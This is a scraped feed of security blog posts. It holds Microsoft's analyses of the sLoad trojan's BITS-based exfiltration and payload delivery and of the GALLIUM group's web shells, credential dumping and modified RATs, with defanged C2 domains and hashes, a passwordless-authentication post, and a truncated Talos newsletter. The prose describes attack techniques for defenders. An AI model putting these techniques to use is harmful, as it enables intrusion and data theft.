it\u2019s important to maintain contact with an active C2. As the malicious domains cannot stay up and running for a long time, the malware includes functionality to refresh the list of C2s every time the scheduled task runs. 
Using a BITS download job, the malware downloads a new copy of web.ini from the active C2 to provision a new set of C2s for future use.\n\n\n\n### Exfiltrating system information\n\nOnce an active C2 is identified, the malware starts collecting system information by performing the following:\n\n * saves the output of the \u201cnet view\u201d command\n * enumerates network drives and saves the provider names and device ids\n * produces the list of all running processes\n * obtains the OS caption\n * looks for the Outlook folder, as well as Independent Computing Architecture (ICA) files, which are used by Citrix application servers to store configuration information\n\nIt then creates a BITS download job with the _RemoteURL_ built using the URL for the active C2 and the system information collected up to this point.\n\nCrafting URLs infused with stolen info is not a novel attacker technique. In addition, creating a BITS job with an extremely large _RemoteURL_ parameter that includes non-encrypted system information stands out and is relatively easy to detect. However, this malware\u2019s use of a download job instead of an upload job is a clever move to achieve stealth.\n\n\n\n\n\n\n\n\n\n\n\n### Deploying additional payloads\n\nBecause the malware exfiltrates system information using a BITS download job, it gets an opportunity to receive a response in the form of a file downloaded to the machine. It uses this opportunity to obtain additional payloads from the C2.\n\nIt sleeps and waits for the file to be downloaded. If the downloaded file instructs it to download and invoke additional PowerShell code, the supplied URL is used for the task. If not, then the URL is assumed to be pointing to an encoded PE image payload. The malware creates another BITS download job to download this payload, creates a copy of this newly downloaded encoded file, and uses another Windows utility, _certutil.exe_, to decode it into a portable executable (PE) file with an .exe extension. 
Finally, it uses _PowerShell.exe_ to run the decoded PE payload. One more BITS download job is created to download additional files.\n\n\n\n### Spying\n\nThe malware comes built with one of the most notorious spyware features: uploading screenshots. At several stages during the installation as well as when running additional payloads, the malware takes several screenshots at short intervals. It then uses a BITS upload job to send the stolen screenshots to the active C2. This is the only time that it uses an upload job, and these are the only files it uploads to the C2. Once uploaded, the screenshots are deleted from the machine.\n\n\n\n\n\n## Conclusion: Multiple layers of protection against multi-stage living-off-the-land threats\n\nsLoad is just one example of the increasingly more prevalent threats that can perform most of their malicious activities by simply living off the land. In this case, it\u2019s a dangerous threat that\u2019s equipped with notorious spyware capabilities, infiltrative payload delivery, and data exfiltration capabilities. sLoad\u2019s behavior can be classified as a [Type III fileless technique](<https://docs.microsoft.com/en-us/windows/security/threat-protection/intelligence/fileless-threats#type-iii-files-required-to-operate>): while it drops some malware files during installation, its use of only BITS jobs to perform most of its harmful behaviors and scheduled tasks for persistence achieves an almost fileless presence on compromised machines.\n\nTo defeat multi-stage, stealthy, and persistent threats like sLoad, [Microsoft Defender ATP](<https://www.microsoft.com/en-us/WindowsForBusiness/windows-atp>)\u2019s antivirus component uses [multiple next-generation protection engines](<https://www.microsoft.com/security/blog/2019/06/24/inside-out-get-to-know-the-advanced-technologies-at-the-core-of-microsoft-defender-atp-next-generation-protection/>) on the client and in the cloud. 
While most threats are identified and stopped by many of these engines, [behavioral blocking and containment](<https://www.microsoft.com/security/blog/2019/10/08/in-hot-pursuit-of-elusive-threats-ai-driven-behavior-based-blocking-stops-attacks-in-their-tracks/>) capabilities detects malicious behaviors and blocks threats after they have started running:\n\n  \n\nThese detections are also surfaced in Microsoft Defender Security Center. Security operations teams can then use Microsoft Defender ATP\u2019s other capabilities like endpoint detection and response (EDR), automated investigation and response, Threat and Vulnerability Management, and Microsoft Threat Experts to investigate and respond to attacks. This reflects the defense-in-depth strategy that is central to the unified endpoint protection provided by Microsoft Defender ATP.\n\nAs part of [Microsoft Threat Protection](<https://www.microsoft.com/en-us/security/technology/threat-protection>), Microsoft Defender ATP shares security signals about this threat to other security services, which likewise inform and enrich endpoint protection. For example, Office 365 ATP\u2019s intelligence on the emails that carry sLoad is shared to and used by Microsoft Defender ATP to build even stronger defenses at the source of infection. Real-time signal-sharing across Microsoft\u2019s security services gives Microsoft Threat Protection unparalleled visibility across attack vectors and the unique ability to provide comprehensive protection against identities, endpoints, data, cloud apps, and infrastructure.\n\n \n\n**_Sujit Magar_** \n_Microsoft Defender ATP Research Team_\n\n \n\n \n\n* * *\n\n### Talk to us\n\nQuestions, concerns, or insights on this story? 
Join discussions at the [Microsoft Defender ATP community](<https://techcommunity.microsoft.com/t5/Microsoft-Defender-ATP/bg-p/MicrosoftDefenderATPBlog>).\n\nRead all [Microsoft security intelligence blog posts](<https://www.microsoft.com/security/blog/microsoft-security-intelligence/>).\n\nFollow us on Twitter [**@MsftSecIntel**](<https://twitter.com/MsftSecIntel>).\n\n \n\nThe post [Multi-stage downloader Trojan sLoad abuses BITS almost exclusively for malicious activities](<https://www.microsoft.com/security/blog/2019/12/12/multi-stage-downloader-trojan-sload-abuses-bits-almost-exclusively-for-malicious-activities/>) appeared first on [Microsoft Security.", "modified": "2019-12-12T17:30:26", "published": "2019-12-12T17:30:26", "id": "MSSECURE:BD0F0BF0F7D5A1716CF03AF5A3C7210C", "href": "https://www.microsoft.com/security/blog/2019/12/12/multi-stage-downloader-trojan-sload-abuses-bits-almost-exclusively-for-malicious-activities/", "type": "mssecure", "title": "Multi-stage downloader Trojan sLoad abuses BITS almost exclusively for malicious activities", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2019-12-12T17:21:23", "bulletinFamily": "blog", "description": "Microsoft Threat Intelligence Center (MSTIC) is raising awareness of the ongoing activity by a group we call GALLIUM, targeting telecommunication providers. When Microsoft customers have been targeted by this activity, we notified them directly with the relevant information they need to protect themselves. By sharing the detailed methodology and indicators related to GALLIUM activity, we\u2019re encouraging the security community to implement active defenses to secure the broader ecosystem from these attacks.\n\nTo compromise targeted networks, GALLIUM target unpatched internet-facing services using publicly available exploits and have been known to target vulnerabilities in WildFly/JBoss. 
Once persistence is established in a network, GALLIUM uses common techniques and tools like Mimikatz to obtain credentials that allow for lateral movement across the target network. Within compromised networks, GALLIUM makes no attempt to obfuscate its intent and is known to use common versions of malware and publicly available toolkits with small modifications. The operators rely on low-cost and easy-to-replace infrastructure that consists of dynamic-DNS domains and regularly reused hop points.\n\nThis activity from GALLIUM has been identified predominantly through 2018 to mid-2019. GALLIUM is still active; however, activity levels have dropped when compared to what was previously observed.\n\nFollowing Microsoft\u2019s internal practices of assigning chemical elements to activity groups, GALLIUM is the code name for this activity group.\n\n### GALLIUM\u2019s profile\n\n**Reconnaissance methods**\n\nAs is often the case with reconnaissance methods, it\u2019s difficult to be definitive about those employed by GALLIUM. This is due to the passive nature of reconnaissance activities by the actor, including the use of freely available data from open sources, such as public websites and social media outlets. However, based on MSTIC analyst assessments, GALLIUM\u2019s exploitation of internet-facing services indicates it\u2019s likely they use open source research and network scanning tools to identify likely targets.\n\n### Delivery and exploitation\n\nTo gain initial access to a target network, GALLIUM locates and exploits internet-facing services such as web servers. GALLIUM has been observed exploiting unpatched web services, such as WildFly/JBoss, for which exploits are widely available. 
Compromising a web server gives GALLIUM a foothold in the victim network that doesn\u2019t require user interaction, such as traditional delivery methods like phishing.\n\nFollowing exploitation of the web servers, GALLIUM actors typically install [web shells](<https://attack.mitre.org/techniques/T1100/>), and then install additional tooling to allow them to explore the target network.\n\n**Lateral movement**\n\nGALLIUM uses a variety of tools to perform reconnaissance and move laterally within a target network. The majority of these are off-the-shelf tools or modified versions of known security tools. MSTIC investigations indicate that GALLIUM modifies its tooling to the extent it evades antimalware detections rather than develop custom functionality. This behavior has been observed with GALLIUM actors across several operational areas.\n\nGALLIUM has been observed using several tools. Samples of the most prevalent are noted in Table 1.\n\n**Tool** | **Purpose** \n---|--- \n[HTRAN](<https://attack.mitre.org/software/S0040/>) | Connection bouncer to proxy connections. \n[Mimikatz](<https://attack.mitre.org/software/S0002/>) | Credential dumper. \n[NBTScan](<https://sectools.org/tool/nbtscan/>) | Scanner for open NETBIOS nameservers on a local or remote TCP/IP network. \nNetcat | Reads from and writes to network connections using TCP or UDP protocols. \n[PsExec](<https://docs.microsoft.com/en-us/sysinternals/downloads/psexec>) | Executes a command line process on a remote machine. \n[Windows Credential Editor (WCE)](<https://attack.mitre.org/software/S0005/>) | Credential dumper. \nWinRAR | Archiving utility. \n \n_Table __1__: GALLIUM tooling._\n\nGALLIUM has signed several tools using stolen code signing certificates. For example, they\u2019ve used a credential dumping tool signed using a stolen certificate from _Whizzimo, LLC_, as shown in Figure 1. 
The code signing certificate shown in Figure 1 was no longer valid at the time of writing; however, it shows GALLIUM had access to such certificates.\n\n\n\n_Figure 1. Credential dumping tool signed using a stolen Whizzimo, LLC certificate._\n\nGALLIUM primarily relies on compromised domain credentials to move through the target network, and as outlined above, uses several credential harvesting tools. Once they have acquired credentials, the activity group uses PsExec extensively to move laterally between hosts in the target network.\n\n**Installation**\n\nGALLIUM predominantly uses widely available tools. In certain instances, GALLIUM has modified these tools to add additional functionality. However, it\u2019s likely these modifications have been made to subvert antimalware solutions since much of the malware and tooling employed by GALLIUM is historic and is widely detected by security products. For example, [QuarkBandit](<https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Trojan:Win32/QuarkBandit.A!dha>) is a modified version of the widely used Gh0st RAT, an openly available remote access tool (RAT). Similarly, GALLIUM has made use of a modified version of the widely available [Poison Ivy RAT](<https://www.cyber.nj.gov/threat-profiles/trojan-variants/poison-ivy>). These RATs and the [China Chopper web shell](<https://attack.mitre.org/software/S0020/>) form the basis of GALLIUM\u2019s toolkit for maintaining access to a victim network.\n\n**Infrastructure**\n\nGALLIUM predominantly uses dynamic DNS subdomains to provide command and control (C2) infrastructure for their malware. Typically, the group uses the ddns.net and myftp.biz domains provided by noip.com. 
MSTIC analysis indicates that the use of dynamic DNS providers as opposed to registered domains is in line with GALLIUM\u2019s trend towards low-cost, low-effort operations.\n\nGALLIUM domains have been observed hosted on infrastructure in mainland China, Hong Kong SAR, and Taiwan.\n\nWhen connecting to web shells on a target network, GALLIUM has been observed employing Taiwan-based servers. Observed IP addresses appear to be exclusive to GALLIUM, have little to no legitimate activity, and are reused in multiple operations. These servers provide high fidelity pivot points during an investigation.\n\nA package of GALLIUM indicators containing GALLIUM command and control domains used during this operation has been prepared for [Azure Sentinel](<https://azure.microsoft.com/en-us/services/azure-sentinel/>) and is available on the [Microsoft GitHub](<https://github.com/Azure/Azure-Sentinel/blob/master/Detections/MultipleDataSources/GalliumIOCs.yaml>).\n\n\n\n_Figure __2.__ Azure Sentinel query of GALLIUM indicators._\n\n### GALLIUM use of malware\n\n**First stage **\n\nGALLIUM does not typically use a traditional first stage installer for their malware. Instead, the group relies heavily on web shells as a first method of persistence in a victim network following successful exploitation. Subsequent malware is then delivered through existing web shell access.\n\nMicrosoft Defender Advanced Threat Protection (ATP) exposes anomalous behavior that indicates web shell installation and post-compromise activity by analysing script file writes and process executions. [Microsoft Defender ATP](<https://www.microsoft.com/en-us/microsoft-365/windows/microsoft-defender-atp>) offers a number of detections for web shell activity, protecting customers not just from GALLIUM activity but from broader web shell activity too. Read the full report in your [Microsoft Defender ATP portal](<https://securitycenter.windows.com/threatanalytics2/52fd70be-ec19-48d7-84e8-dfb7a0ed7123>).\n\n\n\n_Figure 3. 
__Microsoft Defender ATP web shell detection._\n\nWhen alerted of these activities, the security operations team can then use the rich capabilities in Microsoft Defender ATP to investigate web shell activity and subsequent reconnaissance and enumeration activity to resolve web shell attacks.\n\n\n\n_Figure 4. Microsoft Defender ATP web shell process tree._\n\nIn addition to standard [China Chopper](<https://attack.mitre.org/software/S0020/>), GALLIUM has been observed using a native web shell for servers running Microsoft IIS that is based on the China Chopper web shell; Microsoft has called this \u201cBlackMould.\u201d\n\nBlackMould contains functionality to perform the following tasks on a victim host:\n\n * Enumerate local drives.\n * Employ basic file operations like find, read, write, delete, and copy.\n * Set file attributes.\n * Exfiltrate and infiltrate files.\n * Run cmd.exe with parameters.\n\nCommands are sent in the body of HTTP POST requests.\n\n**Second stage**\n\nIn cases where GALLIUM has deployed additional malware on a victim network, they\u2019ve used versions of the [Gh0st RAT](<https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Trojan:Win32/QuarkBandit.A!dha>) (modified Ghost RAT detected as QuarkBandit) and [Poison Ivy](<https://www.cyber.nj.gov/threat-profiles/trojan-variants/poison-ivy>) malware. In both cases, GALLIUM has modified the communication method used by the malware, likely to prevent detection through existing antimalware signatures since both malware families have several detections based on their original communication methods. Malware families are noted in Table 2.\n\n**Malware family** | **Description and primary usage** \n---|--- \n[BlackMould](<https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Trojan%3aWin32%2fChopper.A>) | Native IIS web shell based on the China Chopper web shell. 
\n[China Chopper](<https://attack.mitre.org/software/S0020/>) | Commonly used and widely shared web shell used by several threat actors. Not unique to GALLIUM. \n[Poison Ivy](<https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?name=Win32/Poison>) (modified) | Poison Ivy is a widely shared remote access tool (RAT) [first identified in 2005](<https://www.cyber.nj.gov/threat-profiles/trojan-variants/poison-ivy>). While Poison Ivy is widely used, the variant GALLIUM has been observed using is a modified version that appears to be unique to GALLIUM. \nQuarkBandit | Gh0st RAT variant with modified configuration options and encryption. \n \n_Table __2__. GALLIUM malware families._\n\nGALLIUM\u2019s malware and tools appear to be highly disposable and low cost. In cases where GALLIUM has invested in modifications to their toolset, they appear to focus on evading antimalware detection, likely to make the malware and tooling more effective.\n\nThe MSTIC team works closely with Microsoft security products to implement detections and protections for GALLIUM malware and tooling in a number of Microsoft products. Figure 4 shows one such detection for a GALLIUM PoisonIvy loader in Microsoft Defender ATP.\n\n\n\n_Figure 5. GALLIUM PoisonIvy loader in Microsoft Defender ATP._\n\nAdditionally, MSTIC has authored a number of antimalware signatures for Windows Defender Antivirus covering the aforementioned malware families; a list of GALLIUM-exclusive signatures can be found in the \u201cRelated indicators\u201d section.\n\nIn addition to these malware families, GALLIUM has been observed employing SoftEther VPN software to facilitate access and maintain persistence in a target network. By installing SoftEther on internal systems, GALLIUM is able to connect through that system as though they are on the internal network of the target. 
SoftEther provides GALLIUM with another means of persistence and flexibility with the added benefit that its traffic may appear to be benign on the target network.\n\n### Recommended defenses\n\nThe following are recommended defenses security operations teams can take to mitigate the impact of threats like GALLIUM in your corporate environment:\n\n * Maintain web server patching and log audits, run web services with minimum required operating system permissions\n * Install security updates on all applications and operating systems promptly. Check the [Security Update Guide](<https://portal.msrc.microsoft.com/>) for detailed information about available Microsoft security updates.\n * For efficient incident response, maintain a forensics-ready network with centralized event logging, file detonation services, and up-to-date asset inventories.\n * Enable cloud-delivered protection and maintain updated antivirus.\n * Turn on cloud-delivered protection and automatic sample submission on Windows Defender Antivirus. These capabilities use artificial intelligence (AI) and machine learning to quickly identify and stop new and unknown threats.\n * Use behavior detection solutions to catch credential dumping or other activity that may indicate a breach.\n * Adopt [Azure ATP](<https://docs.microsoft.com/en-us/azure-advanced-threat-protection/what-is-atp>)\u2014a cloud-based security solution that leverages your on-premises Active Directory signals\u2014to identify, detect, and investigate advanced threats, compromised identities, and malicious insider actions directed at your organization.\n * Use [Microsoft Defender ATP](<https://docs.microsoft.com/en-us/windows/security/threat-protection/microsoft-defender-atp/microsoft-defender-advanced-threat-protection>) to help enterprise networks prevent, detect, investigate, and respond to advanced threats. 
Educate users about protecting personal and business information in social media, filtering unsolicited communication, identifying lures in spear-phishing email and watering holes, and reporting reconnaissance attempts and other suspicious activity.\n * Encourage users to use Microsoft Edge and other web browsers that support SmartScreen, which identifies and blocks malicious websites, including phishing sites, scam sites, and sites that contain exploits and host malware.\n * Institute Multi-Factor Authentication (MFA) to mitigate the impact of compromised accounts. \n * **Note**: Microsoft strongly encourages all customers to download and use passwordless solutions like the [Microsoft Authenticator](<https://www.microsoft.com/en-us/account/authenticator/>) app or Windows Hello to secure your accounts.\n * For Office 365 users, see [MFA support](<https://docs.microsoft.com/en-us/office365/admin/security-and-compliance/set-up-multi-factor-authentication?view=o365worldwide>).\n * For consumer and personal email accounts, [see how to use two-step verification](<https://support.microsoft.com/en-us/help/12408/microsoft-account-how-to-use-two-step-verification>).\n\n### Related indicators\n\nThe list below provides known GALLIUM tooling and Indicators of Compromise (IOCs) observed during this activity. Microsoft encourages customers to implement detections and protections to identify possible prior campaigns or prevent future campaigns against their systems.\n\n**Tooling**\n\n**Tool** | **Purpose** \n---|--- \nHTRAN | Connection bouncer to proxy connections. \nMimikatz | Credential dumper. \nNBTScan | Scanner for open NETBIOS nameservers on a local or remote TCP/IP network. \nNetcat | Reads from and writes to network connections using TCP or UDP protocols. \nPsExec | Executes a command line process on a remote machine. \nWindows Credential Editor (WCE) | Credential dumper. \nWinRAR | Archiving utility. 
\n \n**Malware**\n\n**Malware** | **Notes** \n---|--- \nBlackMould | Native IIS version of the China Chopper web shell. \nChina Chopper | Commonly used and widely shared web shell used by several threat actors. Not unique to GALLIUM. \nPoison Ivy (modified) | Poison Ivy is a widely shared remote access tool (RAT) first identified in 2005. While Poison Ivy is widely used, the variant GALLIUM has been observed using is a modified version which appears to be unique to GALLIUM. \nQuarkBandit | Gh0st RAT variant with modified configuration options and encryption. \n \n**Indicators**\n\n**Indicator ** | **Typ****e ** \n---|--- \nasyspy256[.]ddns[.]net | Domain \nhotkillmail9sddcc[.]ddns[.]net | Domain \nrosaf112[.]ddns[.]net | Domain \ncvdfhjh1231[.]myftp[.]biz | Domain \nsz2016rose[.]ddns[.]net | Domain \ndffwescwer4325[.]myftp[.]biz | Domain \ncvdfhjh1231[.]ddns[.]net | Domain \n9ae7c4a4e1cfe9b505c3a47e66551eb1357affee65bfefb0109d02f4e97c06dd | Sha256 \n7772d624e1aed327abcd24ce2068063da0e31bb1d5d3bf2841fc977e198c6c5b | Sha256 \n657fc7e6447e0065d488a7db2caab13071e44741875044f9024ca843fe4e86b5 | Sha256 \n2ef157a97e28574356e1d871abf75deca7d7a1ea662f38b577a06dd039dbae29 | Sha256 \n52fd7b90d7144ac448af4008be639d4d45c252e51823f4311011af3207a5fc77 | Sha256 \na370e47cb97b35f1ae6590d14ada7561d22b4a73be0cb6df7e851d85054b1ac3 | Sha256 \n5bf80b871278a29f356bd42af1e35428aead20cd90b0c7642247afcaaa95b022 | Sha256 \n6f690ccfd54c2b02f0c3cb89c938162c10cbeee693286e809579c540b07ed883 | Sha256 \n3c884f776fbd16597c072afd81029e8764dd57ee79d798829ca111f5e170bd8e | Sha256 \n1922a419f57afb351b58330ed456143cc8de8b3ebcbd236d26a219b03b3464d7 | Sha256 \nfe0e4ef832b62d49b43433e10c47dc51072959af93963c790892efc20ec422f1 | Sha256 \n7ce9e1c5562c8a5c93878629a47fe6071a35d604ed57a8f918f3eadf82c11a9c | Sha256 \n178d5ee8c04401d332af331087a80fb4e5e2937edfba7266f9be34a5029b6945 | Sha256 \n51f70956fa8c487784fd21ab795f6ba2199b5c2d346acdeef1de0318a4c729d9 | Sha256 
\n889bca95f1a69e94aaade1e959ed0d3620531dc0fc563be9a8decf41899b4d79 | Sha256 \n332ddaa00e2eb862742cb8d7e24ce52a5d38ffb22f6c8bd51162bd35e84d7ddf | Sha256 \n44bcf82fa536318622798504e8369e9dcdb32686b95fcb44579f0b4efa79df08 | Sha256 \n63552772fdd8c947712a2cff00dfe25c7a34133716784b6d486227384f8cf3ef | Sha256 \n056744a3c371b5938d63c396fe094afce8fb153796a65afa5103e1bffd7ca070 | Sha256 \nTrojanDropper:Win32/BlackMould.A!dha | Signature Name \nTrojan:Win32/BlackMould.B!dha | Signature Name \nTrojan:Win32/QuarkBandit.A!dha | Signature Name \nTrojan:Win32/Sidelod.A!dha | Signature Name \n \nBookmark the [Security blog](<https://www.microsoft.com/security/blog/>) to keep up with our expert coverage on security matters. Also, follow us at [@MSFTSecurity](<https://twitter.com/@MSFTSecurity>) for the latest news and updates on cybersecurity.\n\nThe post [GALLIUM: Targeting global telecom](<https://www.microsoft.com/security/blog/2019/12/12/gallium-targeting-global-telecom/>) appeared first on [Microsoft Security.", "modified": "2019-12-12T17:00:10", "published": "2019-12-12T17:00:10", "id": "MSSECURE:935CD38CAA09DBE225656E26BE7AFBF5", "href": "https://www.microsoft.com/security/blog/2019/12/12/gallium-targeting-global-telecom/", "type": "mssecure", "title": "GALLIUM: Targeting global telecom", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2019-12-12T00:20:45", "bulletinFamily": "blog", "description": "We all know passwords are inherently unsecure. They\u2019re also expensive to manage. Users struggle to remember them. It\u2019s why we\u2019re so passionate about eliminating passwords entirely. Passwordless solutions, such as Windows Hello, FIDO2 security keys, and the Microsoft Authenticator app, provide more secure and convenient sign-in methods. But transitioning your organization to passwordless authentication takes time and careful planning. You may wonder where to start and how long it will take to realize benefits. 
Today, we examine:\n\n * How biometrics improve security while safeguarding user privacy.\n * The cost reductions Microsoft realized from passwordless migration.\n * Steps you can take to better secure your organization and prepare for passwordless.\n\n[](<https://www.microsoft.com/security/blog/wp-content/uploads/2019/12/Go-passwordless-to-strengthen-security-and-reduce-costs-1.png>)\n\n_Microsoft passwordless solutions include Windows Hello, the Microsoft Authenticator app, and FIDO2 security keys._\n\n### Biometric technology improves security and safeguards user privacy\n\nThe goal of user authentication protocols, including passwords, is to verify user identity. But just because a user knows a password doesn\u2019t mean they are the person they claim to be. In fact, 81 percent of breaches leverage stolen or compromised passwords.1 Passwords are not unique identifiers.\n\nTo improve security, we need a better way to uniquely identify users. This is where biometrics come in. Your iris, fingerprint, and face are unique to you\u2014nobody else has the same fingerprint, for example. Passwordless solutions, like Windows Hello, rely on biometrics instead of passwords because biometrics are better at accurately identifying a user.\n\nBiometrics, like other personal identifying information (PII), may raise privacy concerns. Some people worry that technology companies will collect PII and make it available to other entities. Or that their biometric image might get stolen. That\u2019s why Microsoft and other security companies in the Fast IDentity Online (FIDO) Alliance developed the FIDO2 standard to raise the bar for securing credentials. 
Rest assured, Microsoft uses FIDO2-compliant technology that does **NOT** view, store, or transfer **ANY** biometric images.\n\nHere\u2019s how it works:\n\n * When a user creates a biometric sign-in, Windows Hello uses an algorithm to create a unique identifier that is stored locally on the device, encrypted and secured, and never shared with Microsoft.\n * Each time a user signs in, the biometric is compared against the unique identifier.\n * If there is a match, the user is authenticated to the device.\n\nTechnologies like Windows Hello are secure, convenient, and safeguard user privacy.\n\n[](<https://www.microsoft.com/security/blog/wp-content/uploads/2019/12/Go-passwordless-to-strengthen-security-and-reduce-costs-2.jpg>)\n\n_Users can sign in to Windows Hello with a fingerprint scan. The fingerprint image is turned into a unique identifier stored on the device. It does not get stored by Microsoft._\n\n### Improve security, reduce costs, and increase productivity\n\nTo help you think about the costs associated with passwords, we\u2019ll share some numbers from Microsoft\u2019s own experience rolling out passwordless to its users. After about a year since Microsoft began this journey, most users don\u2019t use a password to authenticate to corporate systems, resources, and applications. The company is better protected, but it has also reduced costs.\n\nPasswords are expensive because users frequently forget them. For every password reset Microsoft incurs, soft costs are associated with the productivity lost while a user can\u2019t sign in. 
The company also incurs hard costs for every hour a Helpdesk administrator spends helping a Microsoft user reset their password.\n\nMicrosoft estimated the following costs before rolling out passwordless to its employees:\n\n * $3 million a year in hard costs.\n * $6 million a year in lost productivity.\n\nAs of today, Microsoft has achieved the following benefits from its passwordless rollout:\n\n * Reduced hard and soft costs by 87 percent.\n * As Microsoft costs go down, attackers\u2019 costs go up, so the company is less of a target.\n\n### Going passwordless starts with Multi-Factor Authentication\n\nWhether you\u2019re ready to roll out a passwordless authentication strategy today or in a few years, these steps will help get your organization ready.\n\n * **Step 1: Define your passwordless and biometrics strategy**\u2014At Microsoft, we allow more than one biometric factor to choose from for authentication, which gives people options and helps us meet accessibility needs.\n * **Step 2: Move your identities to the cloud**\u2014Leverage Azure Active Directory (Azure AD) user behavior analytics and security intelligence to help protect your identities, uncover breach patterns, and recover if there is a breach.\n * **Step 3:** **Enable Multi-Factor Authentication (MFA)**\u2014MFA increases security by requiring more than one factor of verification, usually in addition to a password. By enabling MFA, you can reduce the odds of account compromise by 99.9 percent.2 But passwords don\u2019t have to be a factor. 
With passwordless authentication, the biometric identifier is one factor of verification and the device possession is another, removing the risk of passwords from the equation.\n * **Step 4: Pilot passwordless**\u2014Start a pilot test with your riskiest users or groups.\n\n[](<https://www.microsoft.com/security/blog/wp-content/uploads/2019/12/Go-passwordless-to-strengthen-security-and-reduce-costs-3.png>)\n\n_The Microsoft Authenticator app can be used to augment a password as a second factor or to replace a password with biometrics or a device PIN for authentication._\n\nIf you aren\u2019t ready to go passwordless, enable MFA to reduce your odds of a breach. We also recommend that you ban the most easily guessable passwords. Azure AD processes 60 billion authentications in a month and uses the telemetry to automatically block commonly used, weak, or compromised passwords for all Azure AD accounts, but you can add your own custom banned passwords, too.\n\n### Learn more\n\nMicrosoft passwordless solutions include Windows Hello, the Microsoft Authenticator app, and FIDO2 security keys from select partners. 
Each can help you accomplish the following:\n\n * Stronger security.\n * Reduced costs over time.\n * Increased attacker costs.\n * More productive users.\n\nRead more about [Microsoft passwordless solutions](<https://www.microsoft.com/en-us/security/technology/identity-access-management/passwordless>).\n\nWatch the CISO Spotlight Series: [Passwordless: What\u2019s it worth?](<https://www.microsoft.com/en-us/security/ciso-cybersecurity-strategy>)\n\n \n\n_[1] 2018 Verizon Data Breach Investigations report_ \n_[2] 2018 Microsoft Security Research_\n\nThe post [Go passwordless to strengthen security and reduce costs](<https://www.microsoft.com/security/blog/2019/12/11/go-passwordless-strengthen-security-reduce-costs/>) appeared first on [Microsoft Security.", "modified": "2019-12-12T00:00:56", "published": "2019-12-12T00:00:56", "id": "MSSECURE:0DD55CA89ED8480FABE3316C96B992B7", "href": "https://www.microsoft.com/security/blog/2019/12/11/go-passwordless-strengthen-security-reduce-costs/", "type": "mssecure", "title": "Go passwordless to strengthen security and reduce costs", "cvss": {"score": 0.0, "vector": "NONE"}}], "talosblog": [{"lastseen": "2019-12-12T19:55:04", "bulletinFamily": "blog", "description": "[](<http://4.bp.blogspot.com/-YLRBgfX54uk/XKYbVrHlGXI/AAAAAAAAFu8/MxjUEd-3hhQTW4tZkat-cLDi8G5tVm6bgCK4BGAYYCw/s1600/threat-source.png>) \n_Newsletter compiled by Jon Munshaw._ \n \nWelcome to this week\u2019s Threat Source newsletter \u2014 the perfect place to get caught up on all things Talos from the past week. \n \nWe\u2019re entering our Year in Review period. Now\u2019s the time to look back on the top stories from 2019 and think about what we learned. \n \nIn the vulnerability space, Talos researchers were just as busy as always. We disclosed more than one vulnerability per working day this year, many of which were in internet-of-things and ICS devices. 
For more on what we can take away from the year in vulnerability disclosures, check out our post [here](<https://blog.talosintelligence.com/2019/12/vulnerability-discovery-2019.html>). \n \nSpeaking of vulnerabilities, we had many more to add to the yearly count this week. There are too many to name here, but some highlights include a remote code execution bug in [Apple\u2019s Safari web browser](<https://blog.talosintelligence.com/2019/12/apple-safari-SVG-DOS-dec-19.html>) and a [denial-of-service in the Linux kernel](<https://blog.talosintelligence.com/2019/12/vuln-spotlight-linux-w1fi-dos-dec-19.html>). \n \nMicrosoft also disclosed its own set of vulnerabilities as part of the last Patch Tuesday of 2019. Check out our breakdown of the most notable bugs [here](<https://blog.talosintelligence.com/2019/12/microsoft-patch-tuesday-dec-2019.html>) and our Snort rules to protect against exploitation of them [here](<https://blog.snort.org/2019/12/snort-rule-update-for-dec-10-2019.html>). Talos discovered two of the bugs patched this month, [both in Windows Remote Desktop Protocol](<https://blog.talosintelligence.com/2019/12/vuln-spotlight-RDP-Dec-19.html>) in older versions of Windows. \n \n\n\n### Cyber Security Week in Review\n\n * Adobe released its [monthly security update](<https://www.bleepingcomputer.com/news/security/adobe-releases-their-december-2019-security-updates/>) Tuesday, fixing 14 critical vulnerabilities across its suite of products. Among the bugs disclosed are 14 critical vulnerabilities in Adobe Acrobat Reader. \n * A series of news reports this week revealed Ring security cameras are [open to serious exploits](<https://www.vice.com/en_us/article/3a88k5/how-hackers-are-breaking-into-ring-cameras>). In Florida, an attacker took over a Ring\u2019s speaker and shouted racial slurs at the owners. 
And in Tennessee, another man took over a family\u2019s device after only owning it for four days, potentially spying on three young girls and talking to one of them, saying he was santa. \n * A new report from the U.S. National Infrastructure Advisory Council warned the White House that a cyber attack on America\u2019s infrastructure [poses an \u201cexistential threat\u201d](<https://thehill.com/policy/cybersecurity/473682-federal-council-to-trump-cyber-threats-pose-existential-threat-to-the>) to the country. The group also urged U.S. President Donald Trump to take \u201cbold action\u201d to protect ICS systems. \n * A new decryptor from the makers of the Ryuk ransomware [may actually damage larger files](<https://blog.emsisoft.com/en/35023/bug-in-latest-ryuk-decryptor-may-cause-data-loss/>). The program is meant to help a victim recover their files after paying the proposed ransom. \n * The [new \u201cSnatch\u201d ransomware](<https://news.sophos.com/en-us/2019/12/09/snatch-ransomware-reboots-pcs-into-safe-mode-to-bypass-protection/>) evades detection by rebooting Windows machines mid-infection. The malware forces the victim machine to boot in safe mode, and then begin the encryption process. \n * The city of Pensacola, Florida [continues to recover from a ransomware attack](<https://www.cbsnews.com/news/pensacola-cyberattack-hack-downs-city-computers-in-site-of-navy-attack-today-2019-12-09/>), just days after a shooting at a local military base. The city\u2019s phone lines, some email services and other online platforms were still down as of Thursday. \n * Iran says it [fended off a large cyber attack](<https://abcnews.go.com/International/wireStory/iran-defused-large-cyberattack-infrastructure-67651205>) on unspecified \u201celectronic infrastructure.\u201d One government official said he could not provide specific details on the malware, but called the threat actors \u201cvery organized\u201d and \u201cgovernmental.\u201d \n * U.S. 
